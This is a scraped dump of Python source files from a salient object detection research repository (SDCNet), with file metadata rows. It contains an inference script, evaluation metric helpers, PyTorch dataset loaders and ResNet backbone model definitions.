pop = 2
if "Medium" in row[1]:
pop = 3
if "High" in row[1]:
pop = 4
if "Very High" in row[1]:
pop = 5
if pop == -1:
print("err", row[1])
exp = row[2].replace(",", "")
scrape_dict[name] = [pop, int(exp)]
model = load_model('acc_97_44.h5')
|
Python
| 386
| 35.992229
| 107
|
/python/test_python3_cli.py~
| 0.655182
| 0.439846
|
Sssssbo/SDCNet
|
refs/heads/master
|
import numpy as np
import os
import torch
import torch.nn.functional as F
from PIL import Image
from torch.autograd import Variable
from torchvision import transforms
from torch.utils.data import DataLoader
import matplotlib.pyplot as plt
import pandas as pd
from tqdm import tqdm
from misc import check_mkdir, AvgMeter, cal_precision_recall_mae, cal_fmeasure, cal_sizec, cal_sc
from datasets import TestFolder_joint
import joint_transforms
from model import R3Net, SDCNet
torch.manual_seed(2021)
# set which gpu to use
torch.cuda.set_device(6)
# the following two args specify the location of the file of trained model (pth extension)
# you should have the pth file in the folder './$ckpt_path$/$exp_name$'
ckpt_path = './ckpt'
exp_name = 'SDCNet'
msra10k_path = './SOD_label/label_msra10k.csv'
ecssd_path = './SOD_label/label_ECSSD.csv'
dutomrom_path = './SOD_label/label_DUT-OMROM.csv'
dutste_path = './SOD_label/label_DUTS-TE.csv'
hkuis_path = './SOD_label/label_HKU-IS.csv'
pascals_path = './SOD_label/label_PASCAL-S.csv'
sed2_path = './SOD_label/label_SED2.csv'
socval_path = './SOD_label/label_SOC-Val.csv'
sod_path = './SOD_label/label_SOD.csv'
thur15k_path = './SOD_label/label_THUR-15K.csv'
args = {
'snapshot': '30000', # your snapshot filename (exclude extension name)
'save_results': True, # whether to save the resulting masks
'test_mode': 1
}
joint_transform = joint_transforms.Compose([
#joint_transforms.RandomCrop(300),
#joint_transforms.RandomHorizontallyFlip(),
#joint_transforms.RandomRotate(10)
])
img_transform = transforms.Compose([
transforms.Resize((300, 300)),
transforms.ToTensor(),
transforms.Normalize([0.485, 0.456, 0.406], [0.229, 0.224, 0.225])
])
target_transform = transforms.ToTensor()
to_pil = transforms.ToPILImage()
to_test ={'ECSSD': ecssd_path,'SOD': sod_path, 'DUTS-TE': dutste_path} #{'DUTS-TE': dutste_path,'ECSSD': ecssd_path,'SOD': sod_path, 'SED2': sed2_path, 'PASCAL-S': pascals_path, 'HKU-IS': hkuis_path, 'DUT-OMROM': dutomrom_path}
def main():
net = SDCNet(num_classes = 5).cuda()
print('load snapshot \'%s\' for testing, mode:\'%s\'' % (args['snapshot'], args['test_mode']))
print(exp_name)
net.load_state_dict(torch.load(os.path.join(ckpt_path, exp_name, args['snapshot'] + '.pth')))
net.eval()
results = {}
with torch.no_grad():
for name, root in to_test.items():
print('load snapshot \'%s\' for testing %s' %(args['snapshot'], name))
test_data = pd.read_csv(root)
test_set = TestFolder_joint(test_data, joint_transform, img_transform, target_transform)
test_loader = DataLoader(test_set, batch_size=1, num_workers=0, shuffle=False)
precision0_record, recall0_record, = [AvgMeter() for _ in range(256)], [AvgMeter() for _ in range(256)]
precision1_record, recall1_record, = [AvgMeter() for _ in range(256)], [AvgMeter() for _ in range(256)]
precision2_record, recall2_record, = [AvgMeter() for _ in range(256)], [AvgMeter() for _ in range(256)]
precision3_record, recall3_record, = [AvgMeter() for _ in range(256)], [AvgMeter() for _ in range(256)]
precision4_record, recall4_record, = [AvgMeter() for _ in range(256)], [AvgMeter() for _ in range(256)]
precision5_record, recall5_record, = [AvgMeter() for _ in range(256)], [AvgMeter() for _ in range(256)]
precision6_record, recall6_record, = [AvgMeter() for _ in range(256)], [AvgMeter() for _ in range(256)]
mae0_record = AvgMeter()
mae1_record = AvgMeter()
mae2_record = AvgMeter()
mae3_record = AvgMeter()
mae4_record = AvgMeter()
mae5_record = AvgMeter()
mae6_record = AvgMeter()
n0, n1, n2, n3, n4, n5 = 0, 0, 0, 0, 0, 0
if args['save_results']:
check_mkdir(os.path.join(ckpt_path, exp_name, '%s_%s' % (name, args['snapshot'])))
for i, (inputs, gt, labels, img_path) in enumerate(tqdm(test_loader)):
shape = gt.size()[2:]
img_var = Variable(inputs).cuda()
img = np.array(to_pil(img_var.data.squeeze(0).cpu()))
gt = np.array(to_pil(gt.data.squeeze(0).cpu()))
sizec = labels.numpy()
pred2021 = net(img_var, sizec)
pred2021 = F.interpolate(pred2021, size=shape, mode='bilinear', align_corners=True)
pred2021 = np.array(to_pil(pred2021.data.squeeze(0).cpu()))
if labels == 0:
precision1, recall1, mae1 = cal_precision_recall_mae(pred2021, gt)
for pidx, pdata in enumerate(zip(precision1, recall1)):
p, r = pdata
precision1_record[pidx].update(p)
#print('Presicion:', p, 'Recall:', r)
recall1_record[pidx].update(r)
mae1_record.update(mae1)
n1 += 1
elif labels == 1:
precision2, recall2, mae2 = cal_precision_recall_mae(pred2021, gt)
for pidx, pdata in enumerate(zip(precision2, recall2)):
p, r = pdata
precision2_record[pidx].update(p)
#print('Presicion:', p, 'Recall:', r)
recall2_record[pidx].update(r)
mae2_record.update(mae2)
n2 += 1
elif labels == 2:
precision3, recall3, mae3 = cal_precision_recall_mae(pred2021, gt)
for pidx, pdata in enumerate(zip(precision3, recall3)):
p, r = pdata
precision3_record[pidx].update(p)
#print('Presicion:', p, 'Recall:', r)
recall3_record[pidx].update(r)
mae3_record.update(mae3)
n3 += 1
elif labels == 3:
precision4, recall4, mae4 = cal_precision_recall_mae(pred2021, gt)
for pidx, pdata in enumerate(zip(precision4, recall4)):
p, r = pdata
precision4_record[pidx].update(p)
#print('Presicion:', p, 'Recall:', r)
recall4_record[pidx].update(r)
mae4_record.update(mae4)
n4 += 1
elif labels == 4:
precision5, recall5, mae5 = cal_precision_recall_mae(pred2021, gt)
for pidx, pdata in enumerate(zip(precision5, recall5)):
p, r = pdata
precision5_record[pidx].update(p)
#print('Presicion:', p, 'Recall:', r)
recall5_record[pidx].update(r)
mae5_record.update(mae5)
n5 += 1
precision6, recall6, mae6 = cal_precision_recall_mae(pred2021, gt)
for pidx, pdata in enumerate(zip(precision6, recall6)):
p, r = pdata
precision6_record[pidx].update(p)
recall6_record[pidx].update(r)
mae6_record.update(mae6)
img_name = os.path.split(str(img_path))[1]
img_name = os.path.splitext(img_name)[0]
n0 += 1
if args['save_results']:
Image.fromarray(pred2021).save(os.path.join(ckpt_path, exp_name, '%s_%s' % (
name, args['snapshot']), img_name + '_2021.png'))
fmeasure1 = cal_fmeasure([precord.avg for precord in precision1_record],
[rrecord.avg for rrecord in recall1_record])
fmeasure2 = cal_fmeasure([precord.avg for precord in precision2_record],
[rrecord.avg for rrecord in recall2_record])
fmeasure3 = cal_fmeasure([precord.avg for precord in precision3_record],
[rrecord.avg for rrecord in recall3_record])
fmeasure4 = cal_fmeasure([precord.avg for precord in precision4_record],
[rrecord.avg for rrecord in recall4_record])
fmeasure5 = cal_fmeasure([precord.avg for precord in precision5_record],
[rrecord.avg for rrecord in recall5_record])
fmeasure6 = cal_fmeasure([precord.avg for precord in precision6_record],
[rrecord.avg for rrecord in recall6_record])
results[name] = {'fmeasure1': fmeasure1, 'mae1': mae1_record.avg,'fmeasure2': fmeasure2,
'mae2': mae2_record.avg, 'fmeasure3': fmeasure3, 'mae3': mae3_record.avg,
'fmeasure4': fmeasure4, 'mae4': mae4_record.avg, 'fmeasure5': fmeasure5,
'mae5': mae5_record.avg, 'fmeasure6': fmeasure6, 'mae6': mae6_record.avg}
print('test results:')
print('[fmeasure1 %.3f], [mae1 %.4f], [class1 %.0f]\n'\
'[fmeasure2 %.3f], [mae2 %.4f], [class2 %.0f]\n'\
'[fmeasure3 %.3f], [mae3 %.4f], [class3 %.0f]\n'\
'[fmeasure4 %.3f], [mae4 %.4f], [class4 %.0f]\n'\
'[fmeasure5 %.3f], [mae5 %.4f], [class5 %.0f]\n'\
'[fmeasure6 %.3f], [mae6 %.4f], [all %.0f]\n'%\
(fmeasure1, mae1_record.avg, n1, fmeasure2, mae2_record.avg, n2, fmeasure3, mae3_record.avg, n3, fmeasure4, mae4_record.avg, n4, fmeasure5, mae5_record.avg, n5, fmeasure6, mae6_record.avg, n0))
def accuracy(y_pred, y_actual, topk=(1,)):
"""Computes the precision@k for the specified values of k"""
final_acc = 0
maxk = max(topk)
# for prob_threshold in np.arange(0, 1, 0.01):
PRED_COUNT = y_actual.size(0)
PRED_CORRECT_COUNT = 0
prob, pred = y_pred.topk(maxk, 1, True, True)
# prob = np.where(prob > prob_threshold, prob, 0)
for j in range(pred.size(0)):
if int(y_actual[j]) == int(pred[j]):
PRED_CORRECT_COUNT += 1
if PRED_COUNT == 0:
final_acc = 0
else:
final_acc = float(PRED_CORRECT_COUNT / PRED_COUNT)
return final_acc * 100, PRED_COUNT
if __name__ == '__main__':
main()
|
Python
| 226
| 45.637169
| 227
|
/infer_SDCNet.py
| 0.54592
| 0.509962
|
Sssssbo/SDCNet
|
refs/heads/master
|
from .resnext101 import ResNeXt101
|
Python
| 1
| 34
| 34
|
/resnext/__init__.py
| 0.857143
| 0.685714
|
Sssssbo/SDCNet
|
refs/heads/master
|
import numpy as np
import os
import pylab as pl
#import pydensecrf.densecrf as dcrf
class AvgMeter(object):
def __init__(self):
self.reset()
def reset(self):
self.val = 0
self.avg = 0
self.sum = 0
self.count = 0
def update(self, val, n=1):
self.val = val
self.sum += val * n
self.count += n
self.avg = self.sum / self.count
def check_mkdir(dir_name):
if not os.path.exists(dir_name):
os.mkdir(dir_name)
def cal_precision_recall_mae(prediction, gt):
# input should be np array with data type uint8
assert prediction.dtype == np.uint8
assert gt.dtype == np.uint8
assert prediction.shape == gt.shape
eps = 1e-4
prediction = prediction / 255.
gt = gt / 255.
mae = np.mean(np.abs(prediction - gt))
hard_gt = np.zeros(prediction.shape)
hard_gt[gt > 0.5] = 1
t = np.sum(hard_gt) #t is sum of 1
precision, recall, TPR, FP = [], [], [], []
# calculating precision and recall at 255 different binarizing thresholds
for threshold in range(256):
threshold = threshold / 255.
hard_prediction = np.zeros(prediction.shape)
hard_prediction[prediction > threshold] = 1
#false_pred = np.zeros(prediction.shape)
#false_prediction[prediction < threshold] = 1
a = prediction.shape
tp = np.sum(hard_prediction * hard_gt)
p = np.sum(hard_prediction)
#for roc
#fp = np.sum(false_pred * hard_gt)
#tpr = (tp + eps)/(a + eps)
fp = p - tp
#TPR.append(tpr)
FP.append(fp)
precision.append((tp + eps) / (p + eps))
recall.append((tp + eps) / (t + eps))
return precision, recall, mae#, TPR, FP
def cal_fmeasure(precision, recall):
assert len(precision) == 256
assert len(recall) == 256
beta_square = 0.3
max_fmeasure = max([(1 + beta_square) * p * r / (beta_square * p + r) for p, r in zip(precision, recall)])
return max_fmeasure
def cal_sizec(prediction, gt):
# input should be np array with data type uint8
assert prediction.dtype == np.uint8
assert gt.dtype == np.uint8
assert prediction.shape == gt.shape
eps = 1e-4
#print(gt.shape)
prediction = prediction / 255.
gt = gt / 255.
hard_gt = np.zeros(prediction.shape)
hard_gt[gt > 0.5] = 1
t = np.sum(hard_gt) #t is sum of 1
precision, recall, TPR, FP = [], [], [], []
# calculating precision and recall at 255 different binarizing thresholds
best_threshold = 0
best_F = 0
for threshold in range(256):
threshold = threshold / 255.
gt_size = np.ones(prediction.shape)
a = np.sum(gt_size)
hard_prediction = np.zeros(prediction.shape)
hard_prediction[prediction > threshold] = 1
tp = np.sum(hard_prediction * hard_gt)
p = np.sum(hard_prediction)
#print(a, p)
precision = (tp + eps) / (p + eps)
recall = (tp + eps) / (t + eps)
beta_square = 0.3
fmeasure = (1 + beta_square) * precision * recall / (beta_square * precision + recall)
if fmeasure > best_F:
best_threshold = threshold*255
best_F = fmeasure
sm_size = p / a
if 0 <= sm_size < 0.1:
sizec = 0
elif 0.1 <= sm_size < 0.2:
sizec = 1
elif 0.2 <= sm_size < 0.3:
sizec = 2
elif 0.3 <= sm_size < 0.4:
sizec = 3
elif 0.4 <= sm_size <= 1.0:
sizec = 4
return sizec, best_threshold#, TPR, FP
def cal_sc(gt):
# input should be np array with data type uint8
assert gt.dtype == np.uint8
eps = 1e-4
gt = gt / 255.
#print(gt.shape)
img_size = np.ones(gt.shape)
a = np.sum(img_size)
hard_gt = np.zeros(gt.shape)
hard_gt[gt > 0.5] = 1
p = np.sum(hard_gt)
b = np.sum(gt)
sm_size = float(p) / float(a)
#print(p, a, sm_size, b)
#print(gt)
if 0 <= sm_size < 0.1:
sizec = 0
elif 0.1 <= sm_size < 0.2:
sizec = 1
elif 0.2 <= sm_size < 0.3:
sizec = 2
elif 0.3 <= sm_size < 0.4:
sizec = 3
elif 0.4 <= sm_size <= 1.0:
sizec = 4
return sizec
def pr_cruve(precision, recall):
assert len(precision) == 256
assert len(recall) == 256
r = [a[1] for a in zip(precision, recall)]
p = [a[0] for a in zip(precision, recall)]
pl.title('PR curve')
pl.xlabel('Recall')
pl.xlabel('Precision')
pl.plot(r, p)
pl.show()
# for define the size type of the salient object
def size_aware(gt):
assert gt.dtype == np.uint8
eps = 1e-4
gt = gt / 255.
hard_gt = np.zeros(gt.shape)
hard_gt[gt > 0.5] = 1
t = np.sum(hard_gt)
pic = np.size(hard_gt)
rate = t/pic
return rate
# # codes of this function are borrowed from https://github.com/Andrew-Qibin/dss_crf
# def crf_refine(img, annos):
# def _sigmoid(x):
# return 1 / (1 + np.exp(-x))
# assert img.dtype == np.uint8
# assert annos.dtype == np.uint8
# assert img.shape[:2] == annos.shape
# # img and annos should be np array with data type uint8
# EPSILON = 1e-8
# M = 2 # salient or not
# tau = 1.05
# # Setup the CRF model
# d = dcrf.DenseCRF2D(img.shape[1], img.shape[0], M)
# anno_norm = annos / 255.
# n_energy = -np.log((1.0 - anno_norm + EPSILON)) / (tau * _sigmoid(1 - anno_norm))
# p_energy = -np.log(anno_norm + EPSILON) / (tau * _sigmoid(anno_norm))
# U = np.zeros((M, img.shape[0] * img.shape[1]), dtype='float32')
# U[0, :] = n_energy.flatten()
# U[1, :] = p_energy.flatten()
# d.setUnaryEnergy(U)
# d.addPairwiseGaussian(sxy=3, compat=3)
# d.addPairwiseBilateral(sxy=60, srgb=5, rgbim=img, compat=5)
# # Do the inference
# infer = np.array(d.inference(1)).astype('float32')
# res = infer[1, :]
# res = res * 255
# res = res.reshape(img.shape[:2])
# return res.astype('uint8')
|
Python
| 227
| 25.356829
| 110
|
/misc.py
| 0.56343
| 0.531673
|
Sssssbo/SDCNet
|
refs/heads/master
|
from .make_model import ResNet50, ResNet50_BIN, ResNet50_LowIN
|
Python
| 1
| 62
| 62
|
/resnet/__init__.py
| 0.822581
| 0.725806
|
Sssssbo/SDCNet
|
refs/heads/master
|
from .resnet import ResNet, BasicBlock, Bottleneck
import torch
from torch import nn
from .config import resnet50_path
model_urls = {
'resnet18': 'https://download.pytorch.org/models/resnet18-5c106cde.pth',
'resnet34': 'https://download.pytorch.org/models/resnet34-333f7ec4.pth',
'resnet50': 'https://download.pytorch.org/models/resnet50-19c8e357.pth',
'resnet101': 'https://download.pytorch.org/models/resnet101-5d3b4d8f.pth',
'resnet152': 'https://download.pytorch.org/models/resnet152-b121ed2d.pth',
}
class ResNet50(nn.Module):
def __init__(self):
super(ResNet50, self).__init__()
net = ResNet(last_stride=2,
block=Bottleneck, frozen_stages=False,
layers=[3, 4, 6, 3])
net.load_param(resnet50_path)
self.layer0 = net.layer0
self.layer1 = net.layer1
self.layer2 = net.layer2
self.layer3 = net.layer3
self.layer4 = net.layer4
def forward(self, x):
layer0 = self.layer0(x)
layer1 = self.layer1(layer0)
layer2 = self.layer2(layer1)
layer3 = self.layer3(layer2)
layer4 = self.layer4(layer3)
return layer4
def load_param(self, trained_path):
param_dict = torch.load(trained_path)
for i in param_dict:
if 'classifier' in i or 'arcface' in i:
continue
self.state_dict()[i].copy_(param_dict[i])
print('Loading pretrained model from {}'.format(trained_path))
class ResNet50_BIN(nn.Module):
def __init__(self):
super(ResNet50_BIN, self).__init__()
net = ResNet(last_stride=2,
block=IN_Bottleneck, frozen_stages=False,
layers=[3, 4, 6, 3])
net.load_param(resnet50_path)
self.layer0 = net.layer0
self.layer1 = net.layer1
self.layer2 = net.layer2
self.layer3 = net.layer3
self.layer4 = net.layer4
def forward(self, x):
layer0 = self.layer0(x)
layer1 = self.layer1(layer0)
layer2 = self.layer2(layer1)
layer3 = self.layer3(layer2)
layer4 = self.layer4(layer3)
return layer4
def load_param(self, trained_path):
param_dict = torch.load(trained_path)
for i in param_dict:
if 'classifier' in i or 'arcface' in i:
continue
self.state_dict()[i].copy_(param_dict[i])
print('Loading pretrained model from {}'.format(trained_path))
class ResNet50_LowIN(nn.Module):
def __init__(self):
super(ResNet50_LowIN, self).__init__()
net = ResNet_LowIN(last_stride=2,
block=Bottleneck, frozen_stages=False,
layers=[3, 4, 6, 3])
net.load_param(resnet50_path)
self.layer0 = net.layer0
self.layer1 = net.layer1
self.layer2 = net.layer2
self.layer3 = net.layer3
self.layer4 = net.layer4
def forward(self, x):
layer0 = self.layer0(x)
layer1 = self.layer1(layer0)
layer2 = self.layer2(layer1)
layer3 = self.layer3(layer2)
layer4 = self.layer4(layer3)
return layer4
def load_param(self, trained_path):
param_dict = torch.load(trained_path)
for i in param_dict:
if 'classifier' in i or 'arcface' in i:
continue
self.state_dict()[i].copy_(param_dict[i])
print('Loading pretrained model from {}'.format(trained_path))
|
Python
| 104
| 32.740383
| 78
|
/resnet/make_model.py
| 0.586492
| 0.54175
|
Sssssbo/SDCNet
|
refs/heads/master
|
import os
import os.path
import torch.utils.data as data
from PIL import Image
class ImageFolder_joint(data.Dataset):
# image and gt should be in the same folder and have same filename except extended name (jpg and png respectively)
def __init__(self, label_list, joint_transform=None, transform=None, target_transform=None):
imgs = []
self.label_list = label_list
for index, row in label_list.iterrows():
imgs.append((row['img_path'], row['gt_path'], row['label']))
self.imgs = imgs
self.joint_transform = joint_transform
self.transform = transform
self.target_transform = target_transform
def __len__(self):
return len(self.label_list)
def __getitem__(self, index):
img_path, gt_path, label = self.imgs[index]
img = Image.open(img_path).convert('RGB')
target = Image.open(gt_path).convert('L')
if self.joint_transform is not None:
img, target = self.joint_transform(img, target)
if self.transform is not None:
img = self.transform(img)
if self.target_transform is not None:
target = self.target_transform(target)
return img, target, label
class ImageFolder_joint_for_edge(data.Dataset):
# image and gt should be in the same folder and have same filename except extended name (jpg and png respectively)
def __init__(self, label_list, joint_transform=None, transform=None, target_transform=None):
imgs = []
for index, row in label_list.iterrows():
imgs.append((row['img_path'], row['gt_path'], row['label']))
self.imgs = imgs
self.joint_transform = joint_transform
self.transform = transform
self.target_transform = target_transform
def __getitem__(self, index):
img_path, gt_path, label = self.imgs[index]
edge_path = "."+gt_path.split(".")[1]+"_edge."+gt_path.split(".")[2]
img = Image.open(img_path).convert('RGB')
target = Image.open(gt_path).convert('L')
target_edge = Image.open(edge_path).convert('L')
if self.joint_transform is not None:
if img.size != target.size or img.size != target_edge.size:
print("error path:", img_path, gt_path)
print("size:", img.size, target.size, target_edge.size)
img, target, target_edge = self.joint_transform(img, target, target_edge)
if self.transform is not None:
img = self.transform(img)
if self.target_transform is not None:
target = self.target_transform(target)
target_edge = self.target_transform(target_edge)
return img, target, target_edge, label
def __len__(self):
return len(self.imgs)
class TestFolder_joint(data.Dataset):
# image and gt should be in the same folder and have same filename except extended name (jpg and png respectively)
def __init__(self, label_list, joint_transform=None, transform=None, target_transform=None):
imgs = []
for index, row in label_list.iterrows():
imgs.append((row['img_path'], row['gt_path'], row['label']))
self.imgs = imgs
self.joint_transform = joint_transform
self.transform = transform
self.target_transform = target_transform
def __getitem__(self, index):
img_path, gt_path, label = self.imgs[index]
img = Image.open(img_path).convert('RGB')
target = Image.open(gt_path).convert('L')
if self.joint_transform is not None:
img, target = self.joint_transform(img, target)
if self.transform is not None:
img = self.transform(img)
if self.target_transform is not None:
target = self.target_transform(target)
return img, target, label, img_path
def __len__(self):
return len(self.imgs)
def make_dataset(root):
img_list = [os.path.splitext(f)[0] for f in os.listdir(root) if f.endswith('.jpg')]
return [(os.path.join(root, img_name + '.jpg'), os.path.join(root, img_name + '.png')) for img_name in img_list]
class ImageFolder(data.Dataset):
# image and gt should be in the same folder and have same filename except extended name (jpg and png respectively)
def __init__(self, root, joint_transform=None, transform=None, target_transform=None):
self.root = root
self.imgs = make_dataset(root)
self.joint_transform = joint_transform
self.transform = transform
self.target_transform = target_transform
def __getitem__(self, index):
img_path, gt_path = self.imgs[index]
img = Image.open(img_path).convert('RGB')
target = Image.open(gt_path).convert('L')
if self.joint_transform is not None:
img, target = self.joint_transform(img, target)
if self.transform is not None:
img = self.transform(img)
if self.target_transform is not None:
target = self.target_transform(target)
return img, target
def __len__(self):
return len(self.imgs)
|
Python
| 125
| 39.872002
| 118
|
/datasets.py
| 0.623214
| 0.622627
|
Sssssbo/SDCNet
|
refs/heads/master
|
import torch
import torch.nn as nn
from .backbones.resnet import ResNet, Comb_ResNet, Pure_ResNet, Jointin_ResNet, Jointout_ResNet, BasicBlock, Bottleneck, GDN_Bottleneck, IN_Bottleneck, IN2_Bottleneck, SNR_Bottleneck, SNR2_Bottleneck, SNR3_Bottleneck
from loss.arcface import ArcFace
from .backbones.resnet_ibn_a import resnet50_ibn_a, resnet101_ibn_a
from .backbones.se_resnet_ibn_a import se_resnet50_ibn_a, se_resnet101_ibn_a
import torch.nn.functional as F
model_urls = {
'resnet18': 'https://download.pytorch.org/models/resnet18-5c106cde.pth',
'resnet34': 'https://download.pytorch.org/models/resnet34-333f7ec4.pth',
'resnet50': 'https://download.pytorch.org/models/resnet50-19c8e357.pth',
'resnet101': 'https://download.pytorch.org/models/resnet101-5d3b4d8f.pth',
'resnet152': 'https://download.pytorch.org/models/resnet152-b121ed2d.pth',
}
def weights_init_kaiming(m):
classname = m.__class__.__name__
if classname.find('Linear') != -1:
nn.init.kaiming_normal_(m.weight, a=0, mode='fan_out')
nn.init.constant_(m.bias, 0.0)
elif classname.find('Conv') != -1:
nn.init.kaiming_normal_(m.weight, a=0, mode='fan_in')
if m.bias is not None:
nn.init.constant_(m.bias, 0.0)
elif classname.find('BatchNorm') != -1:
if m.affine:
nn.init.constant_(m.weight, 1.0)
nn.init.constant_(m.bias, 0.0)
def weights_init_classifier(m):
classname = m.__class__.__name__
if classname.find('Linear') != -1:
nn.init.normal_(m.weight, std=0.001)
if m.bias:
nn.init.constant_(m.bias, 0.0)
class Backbone(nn.Module):
def __init__(self, num_classes, cfg):
super(Backbone, self).__init__()
last_stride = cfg.MODEL.LAST_STRIDE
model_path = cfg.MODEL.PRETRAIN_PATH
model_name = cfg.MODEL.NAME
self.model_name = cfg.MODEL.NAME
pretrain_choice = cfg.MODEL.PRETRAIN_CHOICE
#block = cfg.MODEL.BLOCK
self.cos_layer = cfg.MODEL.COS_LAYER
self.neck = cfg.MODEL.NECK
self.neck_feat = cfg.TEST.NECK_FEAT
if model_name == 'Pure_resnet50_GDN':
self.in_planes = 2048
self.base = ResNet(last_stride=last_stride,
block=GDN_Bottleneck, frozen_stages=cfg.MODEL.FROZEN,
layers=[3, 4, 6, 3]) #
print('using resnet50 as a backbone')
print(self.base)
elif model_name == 'Comb_resnet50_IN':
self.in_planes = 2048
self.base = Comb_ResNet(last_stride=last_stride,
block=IN_Bottleneck, frozen_stages=cfg.MODEL.FROZEN,
layers=[3, 4, 6, 3]) #
print('using resnet50 as a backbone')
print(self.base)
elif model_name == 'Pure_resnet50_IN2':
self.in_planes = 2048
self.base = Pure_ResNet(last_stride=last_stride,
block=IN2_Bottleneck, frozen_stages=cfg.MODEL.FROZEN,
layers=[3, 4, 6, 3]) #
elif model_name == 'Pure_resnet50_IN':
self.in_planes = 2048
self.base = Pure_ResNet(last_stride=last_stride,
block=IN_Bottleneck, frozen_stages=cfg.MODEL.FROZEN,
layers=[3, 4, 6, 3]) #
print('using resnet50 as a backbone')
print(self.base)
elif model_name == 'Pure_resnet50_SNR':
self.in_planes = 2048
self.base = Pure_ResNet(last_stride=last_stride,
block=SNR_Bottleneck, frozen_stages=cfg.MODEL.FROZEN,
layers=[3, 4, 6, 3]) #
print('using resnet50 as a backbone')
print(self.base)
elif model_name == 'Pure_resnet50_SNR2':
self.in_planes = 2048
self.base = Pure_ResNet(last_stride=last_stride,
block=SNR2_Bottleneck, frozen_stages=cfg.MODEL.FROZEN,
layers=[3, 4, 6, 3]) #
print('using resnet50 as a backbone')
print(self.base)
elif model_name == 'Jointin_resnet50_SNR3':
self.in_planes = 2048
self.base = Jointin_ResNet(last_stride=last_stride,
block=SNR3_Bottleneck, frozen_stages=cfg.MODEL.FROZEN,
layers=[3, 4, 6, 3]) #
print('using resnet50 as a backbone')
print(self.base)
elif model_name == 'Jointout_resnet50_None':
self.in_planes = 2048
self.base = Jointout_ResNet(last_stride=last_stride,
block=Bottleneck, frozen_stages=cfg.MODEL.FROZEN,
layers=[3, 4, 6, 3]) #
print('using resnet50 as a backbone')
print(self.base)
elif model_name == 'Jointout_resnet50_IN':
self.in_planes = 2048
self.base = Jointout_ResNet(last_stride=last_stride,
block=IN_Bottleneck, frozen_stages=cfg.MODEL.FROZEN,
layers=[3, 4, 6, 3]) #
print('using resnet50 as a backbone')
print(self.base)
elif model_name == 'resnet18':
self.in_planes = 512
self.base = ResNet(last_stride=last_stride,
block=BasicBlock, frozen_stages=cfg.MODEL.FROZEN,
layers=[2, 2, 2, 2])
print('using resnet18 as a backbone')
elif model_name == 'resnet34':
self.in_planes = 512
self.base = ResNet(last_stride=last_stride,
block=BasicBlock, frozen_stages=cfg.MODEL.FROZEN,
layers=[3, 4, 6, 3])
print('using resnet34 as a backbone')
elif model_name == 'resnet50_ibn_a':
self.in_planes = 2048
self.base = resnet50_ibn_a(last_stride)
print('using se_resnet50_ibn_a as a backbone')
elif model_name == 'se_resnet50_ibn_a':
self.in_planes = 2048
self.base = se_resnet50_ibn_a(
last_stride, frozen_stages=cfg.MODEL.FROZEN)
print('using se_resnet50_ibn_a as a backbone')
elif model_name == 'resnet101_ibn_a':
self.in_planes = 2048
self.base = resnet101_ibn_a(
last_stride, frozen_stages=cfg.MODEL.FROZEN)
print('using resnet101_ibn_a as a backbone')
elif model_name == 'se_resnet101_ibn_a':
self.in_planes = 2048
self.base = se_resnet101_ibn_a(
last_stride, frozen_stages=cfg.MODEL.FROZEN)
print('using se_resnet101_ibn_a as a backbone')
else:
print('unsupported backbone! but got {}'.format(model_name))
if pretrain_choice == 'imagenet':
self.base.load_param(model_path)
print('Loading pretrained ImageNet model......from {}'.format(model_path))
self.gap = nn.AdaptiveAvgPool2d(1)
self.num_classes = num_classes
if self.cos_layer:
print('using cosine layer')
self.arcface = ArcFace(
self.in_planes, self.num_classes, s=30.0, m=0.50)
else:
self.classifier = nn.Linear(
self.in_planes, self.num_classes, bias=False)
self.classifier.apply(weights_init_classifier)
if model_name == 'Jointin_resnet50_SNR3':
self.classifier = nn.Linear(
self.in_planes, self.num_classes, bias=False)
self.classifier.apply(weights_init_classifier)
self.classifier1 = nn.Linear(512, self.num_classes, bias=False)
self.classifier1.apply(weights_init_classifier)
self.classifier2 = nn.Linear(512, self.num_classes, bias=False)
self.classifier2.apply(weights_init_classifier)
self.classifier3 = nn.Linear(512, self.num_classes, bias=False)
self.classifier3.apply(weights_init_classifier)
self.classifier4 = nn.Linear(512, self.num_classes, bias=False)
self.classifier4.apply(weights_init_classifier)
self.classifier5 = nn.Linear(1024, self.num_classes, bias=False)
self.classifier5.apply(weights_init_classifier)
self.classifier6 = nn.Linear(256, self.num_classes, bias=False)
self.classifier6.apply(weights_init_classifier)
self.classifier7 = nn.Linear(256, self.num_classes, bias=False)
self.classifier7.apply(weights_init_classifier)
self.classifier8 = nn.Linear(256, self.num_classes, bias=False)
self.classifier8.apply(weights_init_classifier)
self.classifier9 = nn.Linear(256, self.num_classes, bias=False)
self.classifier9.apply(weights_init_classifier)
self.classifier10 = nn.Linear(512, self.num_classes, bias=False)
self.classifier10.apply(weights_init_classifier)
self.classifier11 = nn.Linear(128, self.num_classes, bias=False)
self.classifier11.apply(weights_init_classifier)
self.classifier12 = nn.Linear(128, self.num_classes, bias=False)
self.classifier12.apply(weights_init_classifier)
self.classifier13 = nn.Linear(128, self.num_classes, bias=False)
self.classifier13.apply(weights_init_classifier)
self.classifier14 = nn.Linear(128, self.num_classes, bias=False)
self.classifier14.apply(weights_init_classifier)
self.classifier15 = nn.Linear(256, self.num_classes, bias=False)
self.classifier15.apply(weights_init_classifier)
self.classifier16 = nn.Linear(64, self.num_classes, bias=False)
self.classifier16.apply(weights_init_classifier)
self.classifier17 = nn.Linear(64, self.num_classes, bias=False)
self.classifier17.apply(weights_init_classifier)
self.classifier18 = nn.Linear(64, self.num_classes, bias=False)
self.classifier18.apply(weights_init_classifier)
self.classifier19 = nn.Linear(64, self.num_classes, bias=False)
self.classifier19.apply(weights_init_classifier)
elif 'Jointout' in model_name:
self.classifier0 = nn.Linear(64, self.num_classes, bias=False)
self.classifier0.apply(weights_init_classifier)
self.classifier0_1 = nn.Linear(64, self.num_classes, bias=False)
self.classifier0_1.apply(weights_init_classifier)
self.classifier1 = nn.Linear(256, self.num_classes, bias=False)
self.classifier1.apply(weights_init_classifier)
self.classifier1_1 = nn.Linear(256, self.num_classes, bias=False)
self.classifier1_1.apply(weights_init_classifier)
self.classifier2 = nn.Linear(512, self.num_classes, bias=False)
self.classifier2.apply(weights_init_classifier)
self.classifier2_1 = nn.Linear(512, self.num_classes, bias=False)
self.classifier2_1.apply(weights_init_classifier)
self.classifier3 = nn.Linear(1024, self.num_classes, bias=False)
self.classifier3.apply(weights_init_classifier)
self.classifier3_1 = nn.Linear(1024, self.num_classes, bias=False)
self.classifier3_1.apply(weights_init_classifier)
self.classifier4 = nn.Linear(2048, self.num_classes, bias=False)
self.classifier4.apply(weights_init_classifier)
